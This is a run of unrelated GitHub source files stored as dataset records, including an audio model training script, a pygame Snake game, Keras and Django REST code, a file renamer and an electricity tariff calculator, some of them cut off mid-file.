prepare_quantized(pl_module)\n\n # get model complexity from nessi and log results to wandb\n sample = next(iter(train_dl))[0][0].unsqueeze(0)\n shape = pl_module.mel_forward(sample).size()\n macs, params = nessi.get_model_size(pl_module.model, input_size=shape)\n wandb_logger.experiment.config['MACs'] = macs\n wandb_logger.experiment.config['Parameters'] = params\n\n # create monitor to keep track of learning rate - we 
want to check the behaviour of our learning rate schedule\n    lr_monitor = LearningRateMonitor(logging_interval='epoch')\n    # create the pytorch lightning trainer by specifying the number of epochs to train, the logger,\n    # on which kind of device(s) to train and possible callbacks\n    trainer = pl.Trainer(max_epochs=config.n_epochs,\n                         logger=wandb_logger,\n                         accelerator='auto',\n                         devices=1,\n                         callbacks=[lr_monitor,\n                                    QuantizationCallback(),\n                                    QuantParamFreezeCallback(config.freeze_params_epochs)])\n    # start training and validation for the specified number of epochs\n    trainer.fit(pl_module, train_dl, test_dl)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Example of parser. ')\n\n    # general\n    parser.add_argument('--project_name', type=str, default=\"DCASE23_Task1\")\n    parser.add_argument('--wandb_id', type=str, default=None)  # for loading a pre-trained model\n    parser.add_argument('--experiment_name', type=str, default=\"CPJKU_QAT\")\n    parser.add_argument('--num_workers', type=int, default=12)  # number of workers for dataloaders\n\n    # dataset\n    # location to store resampled waveform\n    parser.add_argument('--cache_path', type=str, default=os.path.join(\"datasets\", \"cpath\"))\n\n    # model\n    parser.add_argument('--n_classes', type=int, default=10)  # classification model with 'n_classes' output neurons\n    parser.add_argument('--in_channels', type=int, default=1)\n    # adapt the complexity of the neural network (3 main dimensions to scale CP-Mobile)\n    parser.add_argument('--base_channels', type=int, default=32)\n    parser.add_argument('--channels_multiplier', type=float, default=2.3)\n    parser.add_argument('--expansion_rate', type=int, default=3)\n\n    # training\n    parser.add_argument('--n_epochs', type=int, default=20)\n    parser.add_argument('--batch_size', type=int, default=256)\n    parser.add_argument('--mixstyle_p', type=float, default=0.4)  # frequency mixstyle\n    parser.add_argument('--mixstyle_alpha', type=float, default=0.3)\n    parser.add_argument('--weight_decay', type=float, default=0.0001)\n    parser.add_argument('--roll', type=int, default=4000)  # roll waveform over time\n    parser.add_argument('--dir_prob', type=float, default=0.6)  # prob. to apply device impulse response augmentation\n    ## knowledge distillation\n    parser.add_argument('--temperature', type=float, default=2.0)\n    parser.add_argument('--kd_lambda', type=float, default=0.02)\n\n    # learning rate + schedule\n    # phases:\n    # 1. exponentially increasing warmup phase (for 'warm_up_len' epochs)\n    # 2. constant lr phase using value specified in 'lr' (for 'ramp_down_start' - 'warm_up_len' epochs)\n    # 3. linearly decreasing to value 'last_lr_value' * 'lr' (for 'ramp_down_len' epochs)\n    # 4. finetuning phase using a learning rate of 'last_lr_value' * 'lr' (for the rest of epochs up to 'n_epochs')\n    parser.add_argument('--lr', type=float, default=5e-5)\n    parser.add_argument('--warm_up_len', type=int, default=0)\n    parser.add_argument('--ramp_down_start', type=int, default=1)\n    parser.add_argument('--ramp_down_len', type=int, default=16)\n    parser.add_argument('--last_lr_value', type=float, default=0.1)  # relative to 'lr'\n\n    # preprocessing\n    parser.add_argument('--resample_rate', type=int, default=32000)\n    parser.add_argument('--window_size', type=int, default=3072)  # in samples (corresponds to 96 ms)\n    parser.add_argument('--hop_size', type=int, default=500)  # in samples (corresponds to ~16 ms)\n    parser.add_argument('--n_fft', type=int, default=4096)  # length (points) of fft, e.g. 
4096 point FFT\n parser.add_argument('--n_mels', type=int, default=256) # number of mel bins\n parser.add_argument('--freqm', type=int, default=48) # mask up to 'freqm' spectrogram bins\n parser.add_argument('--timem', type=int, default=0) # mask up to 'timem' spectrogram frames\n parser.add_argument('--fmin', type=int, default=0) # mel bins are created for freqs. between 'fmin' and 'fmax'\n parser.add_argument('--fmax', type=int, default=None)\n parser.add_argument('--fmin_aug_range', type=int, default=1) # data augmentation: vary 'fmin' and 'fmax'\n parser.add_argument('--fmax_aug_range', type=int, default=1000)\n\n # qat specific\n # freeze quantizer parameters and batchnorm stats for last n epochs\n parser.add_argument('--freeze_params_epochs', type=int, default=4)\n\n args = parser.parse_args()\n train(args)\n","repo_name":"fschmid56/cpjku_dcase23","sub_path":"run_qat.py","file_name":"run_qat.py","file_ext":"py","file_size_in_byte":18881,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"79"} +{"seq_id":"18483449458","text":"import pygame\r\nimport random\r\n\r\n# Initialization of Components and Colors\r\npygame.init()\r\npygame.font.init()\r\ncolorBlack = (0, 0, 0)\r\ncolorWhite = (255, 255, 255)\r\ncolorRed = (255, 0, 0)\r\ndisplayWidth = 640\r\ndisplayHeight = 480\r\ngameDisplay = pygame.display.set_mode((displayWidth, displayHeight))\r\npygame.display.set_caption(\"PyGame SNAKE\")\r\nhighScoreFile = open(\"HighScore.txt\", \"r\") # Opening The File Containing High Score in Read Mode\r\nclock = pygame.time.Clock()\r\n\r\n# Game Variables\r\ngameOver = False\r\nendGame = False\r\nyMovement = True\r\nxMovement = True\r\nbodyLength = 1\r\nplayerScore = 0\r\nhighScore = int(highScoreFile.read()) # Reading The High Score\r\nxVelocity = 0\r\nyVelocity = 0\r\nxPosition = round(displayWidth/2)\r\nyPosition = round(displayHeight/2)\r\nxFood = random.randint(35, displayWidth-35)\r\nyFood = random.randint(25, displayHeight-25)\r\nbodyList = []\r\n\r\ndef gameReset() :\r\n global gameOver, endGame, yMovement, xMovement, bodyLength, playerScore, xVelocity, yVelocity, xPosition, yPosition, xFood, yFood, bodyList\r\n gameOver = False\r\n endGame = False\r\n yMovement = True\r\n xMovement = True\r\n bodyLength = 1\r\n playerScore = 0\r\n xVelocity = 0\r\n yVelocity = 0\r\n xPosition = round(displayWidth/2)\r\n yPosition = round(displayHeight/2)\r\n xFood = random.randint(35, displayWidth-35)\r\n yFood = random.randint(25, displayHeight-25)\r\n bodyList = []\r\n\r\n# Game Loop\r\nwhile not endGame :\r\n\r\n # Checking Pressed Key\r\n for keyPress in pygame.event.get() :\r\n if keyPress.type == pygame.KEYDOWN :\r\n if keyPress.key == pygame.K_RIGHT and yMovement :\r\n xVelocity = 5\r\n yVelocity = 0 \r\n yMovement = False\r\n xMovement = True\r\n if keyPress.key == pygame.K_LEFT and yMovement:\r\n xVelocity = -5\r\n yVelocity = 0\r\n yMovement = False\r\n xMovement = True\r\n if keyPress.key == pygame.K_UP and xMovement:\r\n xVelocity = 0\r\n yVelocity = -5\r\n yMovement = True\r\n xMovement = False\r\n if keyPress.key == pygame.K_DOWN and xMovement:\r\n xVelocity = 0\r\n yVelocity = 5 \r\n yMovement = True\r\n xMovement = False\r\n if keyPress.key == pygame.K_SPACE and gameOver:\r\n gameReset()\r\n if keyPress.key == pygame.K_ESCAPE and gameOver:\r\n endGame = True\r\n\r\n if keyPress.type == pygame.QUIT :\r\n endGame = True\r\n \r\n xPosition = xPosition + xVelocity\r\n yPosition = yPosition + yVelocity\r\n\r\n # Score Counter and Random Food 
Spawner\r\n    if abs(xPosition - xFood) < 7 and abs(yPosition - yFood) < 7 and not gameOver :\r\n        playerScore = playerScore + 1\r\n        xFood = random.randint(35, displayWidth-35)\r\n        yFood = random.randint(25, displayHeight-25)\r\n        bodyLength = bodyLength + 1\r\n    \r\n    # Collision Checking 1 (Wall Collision Checking)\r\n    if xPosition < 1 or xPosition > 639 or yPosition < 1 or yPosition > 479 :\r\n        gameOver = True\r\n    \r\n    gameDisplay.fill(colorWhite)\r\n    font = pygame.font.SysFont(None, 40)\r\n\r\n    # Displaying Score and Game Over Message\r\n    if not gameOver :\r\n        text = font.render(\"{}\".format(playerScore), True, (0, 0, 0))\r\n        gameDisplay.blit(text, (320, 5))\r\n        pygame.draw.rect(gameDisplay, colorRed, [xFood, yFood, 15, 15])\r\n    else :\r\n        # High Score Checking and Modifying\r\n        if playerScore > highScore :\r\n            highScoreFile.close()\r\n            highScoreFile = open(\"HighScore.txt\", \"w\") # Opening The File Containing High Score in Write Mode\r\n            highScore = playerScore\r\n            highScoreFile.write(str(highScore)) # Writing The High Score\r\n\r\n        text = font.render(\"Game Over! Your Score : {}\".format(playerScore), True, (0, 0, 0))\r\n        textRectangle = text.get_rect(center=(displayWidth/2, displayHeight/2 - 30))\r\n        gameDisplay.blit(text, textRectangle)\r\n        text = font.render(\"High Score : {}\".format(highScore), True, (0, 0, 0))\r\n        textRectangle = text.get_rect(center=(displayWidth/2, displayHeight/2))\r\n        gameDisplay.blit(text, textRectangle)\r\n        text = font.render(\"Press Space To Restart (OR) Esc To End\", True, (0, 0, 0))\r\n        textRectangle = text.get_rect(center=(displayWidth/2, displayHeight/2 + 30))\r\n        gameDisplay.blit(text, textRectangle)\r\n        xVelocity = yVelocity = 0\r\n\r\n    # Snake Head Position Checking and Length Increasing\r\n    headList = []\r\n    headList.append(xPosition)\r\n    headList.append(yPosition)\r\n    bodyList.append(headList)\r\n\r\n    # Collision Checking 2 (Self Collision Checking)\r\n    for x in bodyList[:len(bodyList)-1] :\r\n        if x == headList and (not xMovement or not yMovement):\r\n            gameOver = True\r\n\r\n    # Drawing Snake and Maintaining Length\r\n    if len(bodyList) > bodyLength :\r\n        del bodyList[0]\r\n    for x, y in bodyList :\r\n        pygame.draw.rect(gameDisplay, colorBlack, [x, y, 15, 15])\r\n\r\n    pygame.display.update()\r\n    clock.tick(24)\r\n\r\nhighScoreFile.close()\r\npygame.quit()\r\nquit()\r\n\r\n## Created by Joydeep Biswas ##\r\n","repo_name":"joydeep-biswas/SNAKE_using_PyGame","sub_path":"SNAKE.py","file_name":"SNAKE.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"413603186","text":"#list of my favourite foods\nmy_foods = ['pizza','falafel','carrot cake']\n\n#copy my list of favourite foods for my friend\nfriend_foods = my_foods[:]\n\n#add a new favourite food to my list\nmy_foods.append('cannoli')\n\n#add a new favourite food to my friend's list\nfriend_foods.append('ice cream')\n\n#print both lists - using for loop\nprint('My favourite foods are:')\nfor food in my_foods:\n    print(food)\n\nprint(\"\\nMy friend's favourite foods are:\")\nfor food in friend_foods:\n    print(food)\n","repo_name":"jac1155mtl/Python","sub_path":"Learning/Python Crash Course/_4_12_more_loops.py","file_name":"_4_12_more_loops.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33349158800","text":"from base.base_trainer import BaseTrain\nimport os\nfrom keras.callbacks import ModelCheckpoint, 
TensorBoard, EarlyStopping, LearningRateScheduler\nfrom trainers.learning_rate_scd import step_decay_wrapper\n\n\n\nclass SoftMaxModelTrainer(BaseTrain):\n def __init__(self, model, train_generator, valid_generator, config):\n super(SoftMaxModelTrainer, self).__init__(model, train_generator, config)\n self.valid_generator = valid_generator\n self.callbacks = []\n self.loss = []\n self.acc = []\n self.val_loss = []\n self.val_acc = []\n self.step_decay_function = step_decay_wrapper(self.config)\n self.init_callbacks()\n\n\n def init_callbacks(self):\n if self.config.callbacks.is_save_model:\n self.callbacks.append(\n ModelCheckpoint(\n filepath=os.path.join(self.config.callbacks.checkpoint_dir, '%s-{epoch:02d}-{val_loss:.2f}.hdf5' % self.config.exp.name),\n monitor=self.config.callbacks.checkpoint_monitor,\n mode=self.config.callbacks.checkpoint_mode,\n save_best_only=self.config.callbacks.checkpoint_save_best_only,\n save_weights_only=self.config.callbacks.checkpoint_save_weights_only,\n verbose=self.config.callbacks.checkpoint_verbose,\n )\n )\n\n self.callbacks.append(\n TensorBoard(\n log_dir=self.config.callbacks.tensorboard_log_dir,\n write_graph=self.config.callbacks.tensorboard_write_graph,\n )\n )\n\n self.callbacks.append(\n EarlyStopping(\n monitor='val_loss', min_delta=0, patience=3, verbose=1, mode='auto')\n )\n\n self.callbacks.append(\n LearningRateScheduler(self.step_decay_function)\n )\n\n #if hasattr(self.config,\"comet_api_key\"):\n # from comet_ml import Experiment\n # experiment = Experiment(api_key=self.config.comet_api_key, project_name=self.config.exp_name)\n # experiment.disable_mp()\n # experiment.log_multiple_params(self.config)\n # self.callbacks.append(experiment.get_keras_callback())\n\n def train(self):\n history = self.model.fit_generator(\n self.generator,\n epochs=self.config.trainer.num_epochs,\n steps_per_epoch=len(self.generator),\n validation_data=self.valid_generator,\n validation_steps=len(self.valid_generator),\n callbacks=self.callbacks,\n verbose=1)\n\n self.loss.extend(history.history['loss'])\n self.acc.extend(history.history['acc'])\n self.val_loss.extend(history.history['val_loss'])\n self.val_acc.extend(history.history['val_acc'])\n","repo_name":"aviresler/antique-gen","sub_path":"trainers/softmax_trainer.py","file_name":"softmax_trainer.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"71187830014","text":"import os\nimport copy\nimport re\n\nclass Jobvar(object):\n\tdef __init__(self, manager, task_id, sub_id, jobvar, max_cycle):\n\t\tself.__manager = manager\n\t\tself.__ext_mgr=self.__manager.load_ext_manager()\n\t\tself.__task = self.__manager.load_task(task_id)\n\t\tself.__sub_id = sub_id\n\t\tself.__jobvar = jobvar\n\t\tself.__max_cycle = max_cycle\n\n\t\tself.__initialize_manager()\n\t\n\tdef __initialize_manager(self):\n\t\tself.__config_mgr\t= self.__manager.load_config_manager()\n\n\t\tself.__backend_mgr = self.__manager.load_backend_manager()\n\t\tself.__bootstrap_mgr = self.__manager.load_bootstrap_manager()\n\t\tself.__navigator_mgr = self.__manager.load_navigator_manager()\n\t\tself.__context_mgr = self.__manager.load_context_manager()\n\t\tself.__action_mgr\t= self.__manager.load_action_manager()\n\t\tself.__launcher_mgr = self.__manager.load_launcher_manager()\n\n\n\n\tdef handle(self):\n\n\t\tjobvar_data=self.__task.data.get('jobvar')\n\t\tprint(\"Showing the info of subjob variables for task 
%s:\"%str(self.__task.data['id']))\n\n\t\tmode=self.__task.data['scenario']['param']['splitter'].get('mode')\n\t\tif mode not in ['splitByJobvar', 'splitByJobvars']:\n\t\t\tprint(\"Command invalid because splitter mode for the task is not splitByJobvars\")\n\t\t\treturn 0\n\n\t\tif (self.__sub_id is not None) and (self.__jobvar is None):\n\t\t\t#print the jobvar sets for the subjob\n\t\t\ttry:\n\t\t\t\tjobvars_this_subjob = jobvar_data[self.__sub_id]\n\t\t\t\tprint(\"The value of subjob variables for subjob %d are as following:\"%int(self.__sub_id))\n\t\t\t\tfor jobvar in jobvars_this_subjob:\n\t\t\t\t\tprint(\"%s: %s\"%(jobvar,jobvars_this_subjob[jobvar]))\n\t\t\texcept:\n\t\t\t\tprint(\"Can't get variables for subjob %d, bad index?\"%int(self.__sub_id))\n\n\t\tif (self.__sub_id is None):\n\t\t\tif self.__jobvar is None: # print the list of jobvars\n\t\t\t\ttry:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvarLists']\n\t\t\t\texcept:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvar_lists']\n\t\t\t\tif jobvar_info is None:\n\t\t\t\t\tprint('There is no info for any jobvar.')\n\t\t\t\telse:\n\t\t\t\t\tlen_count=0\n\t\t\t\t\tvar_count=0\n\t\t\t\t\tprint(\"There're following jobvar lists:\")\n\t\t\t\t\tfor key in jobvar_info:\n\t\t\t\t\t\tprint('%s'%key)\n\t\t\t\t\t\tvar_count+=1\n\t\t\t\t\t\tlen_count=len(jobvar_info[key])\n\t\t\t\t\tprint(\"\")\t\t\n\t\t\t\t\tprint(\"There're %s jobvar lists, each with a length of %s. You can use -i, -j parameters to check their values\"%(var_count, len_count))\n\t\t\t\t\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvarLists'].get(self.__jobvar)\n\t\t\t\texcept:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvar_lists'].get(self.__jobvar)\n\n\t\t\t\tif jobvar_info is None:\n\t\t\t\t\tprint('There is no info for jobvar %s.'%self.__jobvar)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Parameters of jobvar list %s are as following:\"%self.__jobvar)\n\t\t\t\t\tfor key in jobvar_info:\n\t\t\t\t\t\tprint('%s: %s'%(key, jobvar_info[key]))\n\t\t\t\t\tprint(\"\")\t\t\n\n\t\t\t\t\t# put attributes in jobvar_info to jobvar_info['param']; to simplify user definition\n\t\t\t\t\tparam=jobvar_info.get('param',{})\n\t\t\t\t\tjobvar_info_wo_param={k:v for k,v in jobvar_info.items() if k!='param'}\n\t\t\t\t\tif 'param' not in jobvar_info:\n\t\t\t\t\t\tjobvar_info['param']={}\n\t\t\t\t\tjobvar_info['param'].update(jobvar_info_wo_param)\n\t\t\t\t\t# loading jobvar and generate list\n\t\t\t\t\tprint(\"Indexes and values for this jobvar list are:\")\n\t\t\t\t\tjobvar_instance=self.__ext_mgr.load_ext_common('jobvar',jobvar_info)\n\t\t\t\t\tcycle=0\n\t\t\t\t\tcycle_end=False\n\t\t\t\t\twhile cycle self.max_items:\n with open(self.history_file_location, 'w') as new_history_file:\n new_history_file.writelines([item + '\\n' for item in count[:self.max_items]])\n return True\n except IOError:\n return IOError('Failed to open the history file')\n","repo_name":"amr3k/araneus","sub_path":"Araneus/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71779792256","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.renderers import JSONRenderer\n\nfrom 
toyss.models import Toy\nfrom toyss.serializers import ToySerializer\n\n\n# Create your views here.\nclass JSONResponse(HttpResponse):\n    \"\"\"\n    An HttpResponse that renders its content into JSON.\n    \"\"\"\n\n    def __init__(self, data, **kwargs):\n        content = JSONRenderer().render(data)\n        kwargs['content_type'] = 'application/json'\n        super(JSONResponse, self).__init__(content, **kwargs)\n\n\n@csrf_exempt\n@api_view(['GET', 'POST'])\ndef toy_list(request):\n    \"\"\"\n    If the request is a GET, we return a list of all the toys in the database. If the request is a POST, we create a\n    new toy in the database\n\n    :param request: The request object is an HttpRequest object. It contains metadata about the request, including the\n    HTTP method.\n    :return: The HttpResponse object is an object that contains the content that will be returned to the\n    browser\n    \"\"\"\n\n    if request.method == 'GET':\n        toys = Toy.objects.all()\n        serializer = ToySerializer(toys, many=True)\n        return JSONResponse(serializer.data)\n\n    elif request.method == 'POST':\n        toy_data = JSONParser().parse(request)\n        toy_serializer = ToySerializer(data=toy_data)\n        if toy_serializer.is_valid():\n            toy_serializer.save()\n            return JSONResponse(toy_serializer.data, status=201)\n        return JSONResponse(toy_serializer.errors, status=400)\n\n    return HttpResponse(status=405)\n\n\n@csrf_exempt\n@api_view(['GET', 'PUT', 'DELETE'])\ndef toy_detail(request, pk):\n    \"\"\"\n    Retrieve, update or delete a toy.\n\n    :param request: The request object is an HttpRequest object. It contains metadata about the request, including the HTTP\n    method.\n    :param pk: The primary key of the toy that we want to retrieve, update or delete\n    :return: The HttpResponse object is an object that contains the content that will be returned to the browser\n    \"\"\"\n\n    try:\n        toy = Toy.objects.get(pk=pk)\n    except Toy.DoesNotExist:\n        return HttpResponse(status=404)\n\n    if request.method == 'GET':\n        serializer = ToySerializer(toy)\n        return JSONResponse(serializer.data)\n\n    elif request.method == 'PUT':\n        data = JSONParser().parse(request)\n        serializer = ToySerializer(toy, data=data)\n        if serializer.is_valid():\n            serializer.save()\n            return JSONResponse(serializer.data)\n        return JSONResponse(serializer.errors, status=400)\n\n    elif request.method == 'DELETE':\n        toy.delete()\n        return HttpResponse(status=204)\n\n    return HttpResponse(status=405)\n","repo_name":"bumahkib7/Django-toy","sub_path":"toyss/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38539161320","text":"from customer import Customer\nfrom food import Food\nfrom menu import Menu\nfrom mon import dbase\n\nmenu1 = Menu(dbase())\n\norders = []\npizza = Food('pizza', 15, 100)\nburger = Food('burger', 10, 50)\n\nmenu1.add_food([pizza, burger])\n\nmenu1.display()\n\ncust1 = Customer('shreya')\ncust2 = Customer('riya')\n\norders.extend(cust1.order([pizza]))\norders.extend(cust2.order([pizza, burger]))\n\nprint(cust1.bill)\nprint(cust2.bill)\n\n","repo_name":"ShreyaKarmakar/MyRestaurant","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23966890719","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('order', 
'0002_auto_20141007_2032'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='first_name',\n field=models.CharField(max_length=150, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='order',\n name='last_name',\n field=models.CharField(max_length=150, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"SmallsLIVE/smallslive","sub_path":"smallslive/oscar_apps/order/migrations/0003_auto_20181024_1555.py","file_name":"0003_auto_20181024_1555.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"17846901309","text":"#!/usr/bin/env python\n\nimport os\nimport re\nimport argparse\n\nclass Renamer:\n def __init__(self, dir, pattern):\n self.dir = dir\n self.pattern = pattern\n\n def rename_files(self):\n files = os.listdir(self.dir)\n for file in files:\n match = re.match(self.pattern, file)\n if match:\n old_path = os.path.join(self.dir, file)\n new_name = match.group(1) + '.pyc'\n new_path = os.path.join(self.dir, new_name)\n os.rename(old_path, new_path)\n print(f'Renamed {old_path} to {new_path}')\n\ndef rename_files(dir, pattern=r'^(\\w+)\\.cpython-\\d+\\.pyc$'):\n renamer = Renamer(dir, pattern)\n renamer.rename_files()\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Rename pyc files')\n parser.add_argument('dir', metavar='dir', type=str, help='the directory containing the pyc files')\n parser.add_argument('--pattern', metavar='pat', type=str, default=r'^(\\w+)\\.cpython-\\d+\\.pyc$', help='the regular expression pattern to match the pyc filenames')\n args = parser.parse_args()\n rename_files(args.dir, args.pattern)\n","repo_name":"jy3736/pyprog2023s-week04","sub_path":"lib/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21218541932","text":"from lib.postgres_connector import PostgresConnector\nfrom lib.repository import (\n EmpresasValoresInputadosRepository,\n ValorTarifasRepository,\n ValorBandeirasRepository,\n ValorImpostosRepository\n)\n\n\nclass Controller:\n def __init__(self, company_name, reference_date):\n \"\"\"\n Classe que realiza todos os cálculos para as colunas da tabela empresas_valores_calculados.\n É chamada sempre passando na entrada os dados de uma empresa, em um mês, ou seja, quase\n uma linha do banco.\n\n Com esses dados ela busca os demais dados da empresa no banco, e usa eles pra realizar\n os calculos necessários.\n \"\"\"\n self.company_name = company_name\n self.reference_date = reference_date\n\n def execute(self):\n db_connection = PostgresConnector().connect_using_localhost_credentials()\n\n with db_connection as pg_conn:\n empresas_repository = EmpresasValoresInputadosRepository(pg_conn)\n tarifas_repository = ValorTarifasRepository(pg_conn)\n bandeiras_repository = ValorBandeirasRepository(pg_conn)\n impostos_repository = ValorImpostosRepository(pg_conn)\n\n company_month_data = self._get_company_month_data(empresas_repository)\n company_params = self._get_company_params(company_month_data)\n\n print(f\"company_month_data: {company_month_data}\")\n print(f\"company_params: {company_params}\")\n\n # Calculos daqui pra baixo #\n tusde_p_and_fp_reais = self._calculate_tusd_energia_reais(\n company_month_data, company_params, tarifas_repository\n )\n\n energia_cativo_p_and_fp_reais = self._calculate_energia_cativo_reais(\n 
company_month_data, company_params, tarifas_repository\n            )\n\n\n    # def _calculate_sobras_and_ultrapassagem_reais(self, empresas_repository):\n    #     self._calculate_sobras_and_ultrapassagem_kw(empresas_repository)\n\n    # def _calculate_sobras_and_ultrapassagem_kw(self, empresas_repository):\n    #     \"\"\"\n    #     Pega os dados da empresa e mês em questão,\n    #     e aí calcula:\n    #     - IF MODALIDADE = AZUL, calcula Sobra e Ultrapassagem na Ponta, e tbm FP\n    #     - Se for VERDE, apenas fora da ponta\n    #\n    #     Precisa dos valores de demanda_contratada minima e max, pra ponta e fp. isso por\n    #     sua vez precisa ser feito com base nas regras desse slide>\n    #     https://docs.google.com/presentation/d/1xU6kjrg1Zz1NQm2152Rc4whT6MZ1byOAuWRYb5i1DV8/edit#slide=id.gadad5d60d2_0_87\n    #     \"\"\"\n    #     company_data = self._get_company_month_data(empresas_repository)\n    #\n    #     sobra_p_kw = 0,\n    #     sobra_fp_kw = 0\n    #\n    #     if company_data[\"modalidade\"] == \"Azul\":\n    #         sobra_p_kw = dem_contratada_min_p - dem_medida_p\n    #         sobra_fp_kw = 2*(dem_contratada_min_fp - dem_medida_fp)\n    #\n    #     ultrapassagem_p_kw = dem_contratada_max_fp - dem_medida_p\n    #     ultrapassagem_fp_kw = 2*(dem_contratada_max_fp - dem_medida_fp)\n    #\n    #     return {\n    #         \"sobra_p_kw\": sobra_p_kw,\n    #         \"sobra_fp_kw\": sobra_fp_kw,\n    #         \"ultrapassagem_p_kw\": ultrapassagem_p_kw,\n    #         \"ultrapassagem_fp_kw\": ultrapassagem_fp_kw,\n    #     }\n\n    def _calculate_demanda_max_e_min(self, company_month_data, empresas_repository):\n        \"\"\"\n        - Demanda mínima:\n            Ex:\n            [Mês | dem contratada | periodo teste? | Dem mín | Justificativa ]\n            [1 | 30 | FALSE | 30 | É a mesma da contratada, pq não é período de teste]\n            [2 | 75 | TRUE | 30 | É a do último mês antes de ser teste ]\n            [3 | 75 | TRUE | 30 | Como a do mês 2 é igual a desse mês, a demanda min ainda é a do mês anterior ao teste]\n            [4 | 90 | TRUE | 75 | Como a do mês 3 é DIFERENTE a desse mês, a demanda min passa a ser do mês anterior]\n\n            Ou seja:\n            - if periodo de testes:\n                -> demanda minima é igual a demanda contratada do ultimo mês com troca\n            - else = demanda contratada\n\n        - Demanda MÁXIMA FP:\n            - Se não for período de teste, é = demanda contratada*1,05\n            - Se for, é a demanda contratada atual*1,05 + 0,3*(diferença entre demanda contratada ATUAL e a ANTERIOR/ref)\n        \"\"\"\n        is_teste_p = company_month_data[\"is_teste_ponta\"]\n        is_teste_fp = company_month_data[\"is_teste_fora_ponta\"]\n\n        # Demanda Fora Ponta #\n        if not is_teste_fp:\n            demanda_min_fp = company_month_data[\"demanda_contratada_fora_ponta\"]\n            demanda_max_fp = demanda_min_fp*1.05\n\n        else:\n            demanda_contratada_ref = empresas_repository.get_latest_register_with_changes_on_demanda_contratada(\n                tipo_dem_contratada=\"Fora Ponta\"\n            )\n            demanda_contratada_atual = company_month_data[\"demanda_contratada_fora_ponta\"]\n\n            demanda_min_fp = demanda_contratada_ref[\"demanda_contratada_fora_ponta\"]\n            demanda_max_fp = (demanda_contratada_atual * 1.05) + (demanda_contratada_atual - demanda_contratada_ref[\"demanda_contratada_fora_ponta\"])*0.3\n\n        # Demanda Ponta #\n        if not is_teste_p:\n            demanda_min_p = company_month_data[\"demanda_contratada_ponta\"]\n            demanda_max_p = demanda_min_p * 1.05\n\n        else:\n            demanda_contratada_ref = empresas_repository.get_latest_register_with_changes_on_demanda_contratada(\n                tipo_dem_contratada=\"Ponta\"\n            )\n            demanda_contratada_atual = company_month_data[\"demanda_contratada_ponta\"]\n\n            demanda_min_p = demanda_contratada_ref[\"demanda_contratada_ponta\"]\n            demanda_max_p = (demanda_contratada_atual * 1.05) + (demanda_contratada_atual - demanda_contratada_ref[\"demanda_contratada_ponta\"])*0.3\n\n        return {\n            
\"demanda_min_fp\": demanda_min_fp,\n \"demanda_max_fp\": demanda_max_fp,\n \"demanda_min_p\": demanda_min_p,\n \"demanda_max_p\": demanda_max_p,\n }\n\n def _calculate_tusd_energia_reais(\n self, company_month_data, company_params, tarifas_repository\n ):\n \"\"\"\n Calcula TUSD energia pra ponta e fp.\n \"\"\"\n tarifas_month_data_p = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Ponta\"\n )\n\n tarifas_month_data_fp = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Fora Ponta\"\n )\n\n tusd_energia_p = tarifas_month_data_p[\"tusde\"]\n tusd_energia_fp = tarifas_month_data_fp[\"tusde\"]\n\n consumo_p = company_month_data[\"consumo_ponta\"]\n consumo_fp = company_month_data[\"consumo_fora_ponta\"]\n\n tusd_energia_p_reais = consumo_p*tusd_energia_p\n tusd_energia_fp_reais = consumo_fp*tusd_energia_fp\n\n return {\n \"tusd_energia_p_reais\": tusd_energia_p_reais,\n \"tusd_energia_fp_reais\": tusd_energia_fp_reais\n }\n\n def _calculate_energia_cativo_reais(\n self, company_month_data, company_params, tarifas_repository\n ):\n tarifas_month_data_p = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Ponta\"\n )\n\n tarifas_month_data_fp = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Fora Ponta\"\n )\n\n te_p = tarifas_month_data_p[\"te\"]\n te_fp = tarifas_month_data_fp[\"te\"]\n\n consumo_p = company_month_data[\"consumo_ponta\"]\n consumo_fp = company_month_data[\"consumo_fora_ponta\"]\n\n energia_cativo_p_reais = consumo_p*te_p\n energia_cativo_fp_reais = consumo_fp*te_fp\n\n return 